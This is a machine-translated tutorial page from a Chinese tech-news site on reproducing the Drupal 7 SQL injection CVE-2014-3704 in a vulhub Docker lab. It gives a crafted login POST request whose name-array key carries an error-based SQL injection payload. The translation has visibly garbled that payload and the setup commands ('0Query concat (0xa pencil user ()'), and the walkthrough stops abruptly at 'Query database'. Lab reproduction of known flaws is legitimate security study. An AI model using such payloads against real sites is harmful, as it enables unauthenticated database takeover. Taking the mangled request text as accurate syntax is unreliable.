In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-09-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
How to reproduce the Drupal SQL injection vulnerability CVE-2014-3704, many novices are not very clear about this. In order to help you solve this problem, the following editor will explain it in detail. People with this need can come and learn. I hope you can get something.
Drupal is an open source content management framework (CMF) written in PHP. It is composed of a content management system and a PHP development framework, and is released under GPL2.0 and update protocols. Won the global best CMS award for many years in a row, it is the most famous WEB application based on the PHP language.
Drupal is a large amount of CMS, and there is a SQL vulnerability that does not require authentication in its version 7.0 to 7.31. Through this vulnerability, an attacker can execute arbitrary SQL statements, insert, modify administrator information, and even execute arbitrary code.
Affected version: 7.0 / 7.31
The following is only for vulnerability recurrence record and implementation, and the utilization process is as follows:
I. loophole environment
This environment is built with vulhub.
Execute the following instructions to complete the environment construction
Cd drupal/CVE-2014-3704 /
Docker-compose up-d
Port 8080 will be opened after startup.
Vulnerability link: http://192.168.101.152:8080/
Installation is required for the first visit. Default installation is used. Fill in drupal for Mysql database name, root for database user name and password, and mysql for address.
After the installation is complete, visit the home page as follows:
Second, vulnerability exploitation
Send a packet directly
POST /? q=node&destination=node HTTP/1.1
Host: 192.168.101.152:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name [0 or updatexml (0Query concat (0xa pencil user (), 0)% 23] = bob&name [0] = a
The vulnerability can be triggered. Note that Content-Type should be set to application/x-www-form-urlencoded.
Query database
Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
The market share of Chrome browser on the desktop has exceeded 70%, and users are complaining about
The world's first 2nm mobile chip: Samsung Exynos 2600 is ready for mass production.According to a r
A US federal judge has ruled that Google can keep its Chrome browser, but it will be prohibited from
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
About us Contact us Product review car news thenatureplanet
More Form oMedia: AutoTimes. Bestcoffee. SL News. Jarebook. Coffee Hunters. Sundaily. Modezone. NNB. Coffee. Game News. FrontStreet. GGAMEN
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
